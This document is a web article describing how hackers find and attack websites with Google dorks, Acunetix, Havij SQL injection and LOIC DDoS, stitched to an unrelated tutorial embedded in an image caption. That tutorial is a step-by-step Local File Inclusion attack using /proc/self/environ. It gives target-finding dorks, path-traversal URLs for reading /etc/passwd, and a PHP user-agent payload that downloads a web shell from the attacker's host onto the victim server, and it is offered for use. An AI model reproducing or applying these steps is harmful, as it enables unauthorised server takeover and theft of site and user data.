Till yesteryears it required Tech
Geeks to have an above average knowledge to hack a website but these
days it has become a child’s play. Like conventional searches, you can
Google out the tools required to plan a Hack-Attack on a website and
with a little effort you can execute the same with ease. Here it is, in 4
easy steps, how hackers execute it.
Step 1: Identifying
The Hacktivists first identify their target website which they want
to attack upon. They first qualify the website, according to the
vulnerability level, they wish to attack. Checking the vulnerability of
the website allows the hacker to prepare tools and techniques required
to bring down the website.
Hackers generally use Google Dork, or Google Hacking, to execute a
vulnerability check against these easy-to-hack websites. It was very
recent that a hacker posted a list of 5,000 such websites which were
really easy to be attacked. If they don’t wish to Google it out, they
can Bing it. This tool is heaven for hackers as it helps in qualifying
such websites.
Hackers have a ready-to-refer index of Dorks which points out the
websites having a particular vulnerability. Right from passwords to
Login credentials, there is Dork available for everything. They would
Google “intitle:”Index of” master.passwd” which will return them a file
containing the passwords and then they have the list of potential
victims ready with them to execute the hack.
Step 2: Spotting the vulnerabilities
Acunetix – a Windows based application to test the website –
developed by a UK based company, was designed and is still in prominent
use by developers to test the vulnerabilities in the website, but the
technical expertise of hackers to this tool allows them access to point
out the weakness levels of the website. Once the site is identified for
attack, this tool is used by hackers to check the vulnerability of the
website, as all websites qualified in level 1 may not be susceptible to
attack.
Since the hackers have in-depth knowledge of the above mentioned
software, they can not only crack the version from a trial one, but the
cracked version is also available freely amongst the hacker community.
Once they enter the URL or website address in this software they are
able to point out the loopholes in the website and all they do is, move
to step 3.
Step 3: The Attack on the website – SQL Injection
The SQL injection is the easiest and the most used way by hackers to
hack into a website. It is used by hackers to hack into user accounts
and steal information stored into its databases. This attack aims at
information stealing using some lines of code of SQL (Structured Query
List) which is a database programming language. The hacker’s don’t even
have to learn the language for this attack, as there is an available
software called “Havij” in the hacker forums where it is available free
of cost. It comes as an easily useable application. Havij is originally a
development from Iran. The word itself means carrot, a bad-slang for
the word penis, ultimately meaning that the hack-ware helps penetrating a
website.
Havij has 2 versions – paid and unpaid, both of them differential in
powers of penetrating, although the paid version can be cracked and
downloaded from other hacker forums. The interface of this software
completely simple like any other windows application, which does its
work when a newbie hacker just copies the link of the website needed to
hack and pastes it into the application.
The tasks Havij can perform are very surprising. The best one for
them and worst for the users of the website is called “Get”. It fetches
all the data stored in the target website’s databases which range from
usernames, passwords to phone numbers and bank details.
It is so easy for hackers that within a couple of minutes of their
time, in which they can search, download, and use one or two automated
hack-wares that allows them to access websites which are vulnerable to
such attacks. Very much assured, that the websites of high profile
companies like Google, Microsoft and Facebook are completely safe from
such tools. As mentioned before, the vulnerability of the web is
displayed by the attack made on Sony’s PlayStation Network which led to
the leaking of their customers’ personal information in a very similar
way.
Step 4: The DDoS – The A Game
SQL Injection has been used by the infamous hacktivist community –
Anonymous for over a year now, but they tend to go forth with the DDoS
when simple tools like the Havij don’t work. Again like the SQL
(pronounced Sequel) Injection attack there are freely available tools
for the DDoS as well.
As it appears, the DDoS is also as simple as the SQL Injection
attack. The program used here is called the Low Orbit Ion Cannon (LOIC),
which was brought to life by web developers for stress testing their
own websites, but was later hijacked by hackers to attack the websites
for non-social use.
The LOIC is available to the hackers freely on the website Source
Forge. Again as simple as the Havij, the hackers just have to type in
the link of the website they want to DDoS and the application does the
rest. LOIC overloads the server of the target website with upto 200
requests per second.
Now again, the bigger websites can easily cope up with this type of
an attack without crashing, most of the other websites cannot. Surely if
a group of hackers, although newborn, dedicates itself to the job, it
is very easy for them to complete it.
This type of technology horrifies the readers, but it is very simple
to use by the hackers that they can even control it from their phones,
meaning that they could well be watching a movie with their buddies in
the cinema while attacking the website they want to bring down.
This is not an exhaustive list and processes how the hackers execute
the act but there are many a tutorials on various hacking forums that
teach how to perform the attack. There is no end to this notoriousness,
in many cases a heinous crime, which has caused a loss of millions and
millions of dollars to the world. So are you going to get your website
checked through your developer today? May be today would be a real good
day to get it done.
![Photo: Shell Via LFI And /Proc/Self/Environ
Basicly LFI stands for Local File Inclusion. This attack can allow the attacker to gain access to the server by upload a shell to the website.
I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/
II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=
III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>
IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
It should look like showed in the picture 2.
V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F
VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd
VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ
so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron
VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.
Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.
IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php
If that didn't work then try this:
http://www.site.com/urshellname.php
X. Now you have access to the server and it seems that you uploaded your shell successfully
Hit like if you have found it useful!](https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-prn2/t1/p526x296/1902712_277336082430462_1109672197_n.png)
